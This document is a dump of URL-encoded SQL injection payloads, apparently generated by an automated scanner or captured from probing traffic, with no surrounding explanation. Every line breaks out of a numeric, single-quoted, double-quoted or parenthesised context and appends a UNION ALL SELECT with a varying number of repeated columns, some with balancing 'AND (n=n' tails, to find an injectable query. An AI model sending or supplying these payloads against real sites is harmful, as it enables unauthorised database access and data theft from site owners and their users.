-6039%29%20UNION%20ALL%20SELECT%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%2C%201421%00 -2265%29%20UNION%20ALL%20SELECT%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%2C%202437%00 -4598%29%20UNION%20ALL%20SELECT%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%00 -4244%29%20UNION%20ALL%20SELECT%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%2C%201179%00 -3171%27%29%20UNION%20ALL%20SELECT%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%00 -4401%27%29%20UNION%20ALL%20SELECT%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%00 -7857%27%29%20UNION%20ALL%20SELECT%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%2C%204560%00 -3043%27%29%20UNION%20ALL%20SELECT%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%2C%208514%00 -6490%27%29%20UNION%20ALL%20SELECT%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%00 -1512%27%29%20UNION%20ALL%20SELECT%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%2C%205578%00 -4727%27%29%20UNION%20ALL%20SELECT%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%2C%206152%00 -7181%27%29%20UNION%20ALL%20SELECT%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%2C%209292%00 -1459%27%29%20UNION%20ALL%20SELECT%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%00 -5045%27%29%20UNION%20ALL%20SELECT%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%00 -9536%27%20UNION%20ALL%20SELECT%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%00 -4108%27%20UNION%20ALL%20SELECT%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%2C%204027%00 -1892%27%20UNION%20ALL%20SELECT%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%00 -5776%27%20UNION%20ALL%20SELECT%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%00 -5641%27%20UNION%20ALL%20SELECT%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%2C%204568%00 -4533%27%20UNION%20ALL%20SELECT%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%2C%209347%00 -6806%27%20UNION%20ALL%20SELECT%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%2C%206787%00 -1686%27%20UNION%20ALL%20SELECT%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%2C%203751%00 -9749%27%20UNION%20ALL%20SELECT%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%2C%207824%00 -8258%27%20UNION%20ALL%20SELECT%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%2C%204607%00 -6394%22%20UNION%20ALL%20SELECT%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%2C%202085%00 -5380%22%20UNION%20ALL%20SELECT%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%2C%206264%00 -1432%22%20UNION%20ALL%20SELECT%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%2C%204384%00 -1804%22%20UNION%20ALL%20SELECT%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%2C%207884%00 -6083%22%20UNION%20ALL%20SELECT%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%2C%202211%00 -3930%22%20UNION%20ALL%20SELECT%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%2C%205567%00 -9712%22%20UNION%20ALL%20SELECT%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%2C%206507%00 -7174%22%20UNION%20ALL%20SELECT%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%2C%203960%00 -5170%22%20UNION%20ALL%20SELECT%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%2C%205991%00 -5364%22%20UNION%20ALL%20SELECT%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%00 -8786%29%20UNION%20ALL%20SELECT%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%00%20AND%20%287205%3D7205 -9348%29%20UNION%20ALL%20SELECT%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%2C%202498%00%20AND%20%285904%3D5904 -2975%29%20UNION%20ALL%20SELECT%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%00%20AND%20%285083%3D5083 -3050%29%20UNION%20ALL%20SELECT%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%2C%202716%00%20AND%20%285810%3D5810 -8232%29%20UNION%20ALL%20SELECT%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%00%20AND%20%288494%3D8494 -4750%29%20UNION%20ALL%20SELECT%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%2C%207520%00%20AND%20%288897%3D8897 -4497%29%20UNION%20ALL%20SELECT%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%00%20AND%20%289409%3D9409 -8864%29%20UNION%20ALL%20SELECT%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%00%20AND%20%289017%3D9017 -7278%29%20UNION%20ALL%20SELECT%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%00%20AND%20%287628%3D7628 -2864%29%20UNION%20ALL%20SELECT%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%2C%208788%00%20AND%20%286445%3D6445 -1790%29%29%20UNION%20ALL%20SELECT%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%00%20AND%20%28%284439%3D4439 -5315%29%29%20UNION%20ALL%20SELECT%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%2C%201363%00%20AND%20%28%286897%3D6897 -9559%29%29%20UNION%20ALL%20SELECT%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%00%20AND%20%28%282323%3D2323 -5507%29%29%20UNION%20ALL%20SELECT%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%2C%208582%00%20AND%20%28%288179%3D8179 -7622%29%29%20UNION%20ALL%20SELECT%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%2C%209601%00%20AND%20%28%289118%3D9118 -9475%29%29%20UNION%20ALL%20SELECT%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%00%20AND%20%28%287014%3D7014 -9756%29%29%20UNION%20ALL%20SELECT%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%2C%202843%00%20AND%20%28%288207%3D8207 -6289%29%29%20UNION%20ALL%20SELECT%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%2C%208974%00%20AND%20%28%282095%3D2095 -1350%29%29%20UNION%20ALL%20SELECT%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%00%20AND%20%28%281171%3D1171 -1240%29%29%20UNION%20ALL%20SELECT%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%00%20AND%20%28%285239%3D5239 -6667%29%29%29%20UNION%20ALL%20SELECT%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%2C%205328%00%20AND%20%28%28%286175%3D6175 -1682%29%29%29%20UNION%20ALL%20SELECT%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%2C%209420%00%20AND%20%28%28%285718%3D5718 -3026%29%29%29%20UNION%20ALL%20SELECT%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%2C%204555%00%20AND%20%28%28%285844%3D5844 -4134%29%29%29%20UNION%20ALL%20SELECT%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%00%20AND%20%28%28%288068%3D8068 -2417%29%29%29%20UNION%20ALL%20SELECT%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%2C%203635%00%20AND%20%28%28%282469%3D2469 -1990%29%29%29%20UNION%20ALL%20SELECT%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519%00%20AND%20%28%28%289518%3D9518 -7429%29%29%29%20UNION%20ALL%20SELECT%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%2C%202666%00%20AND%20%28%28%281031%3D1031 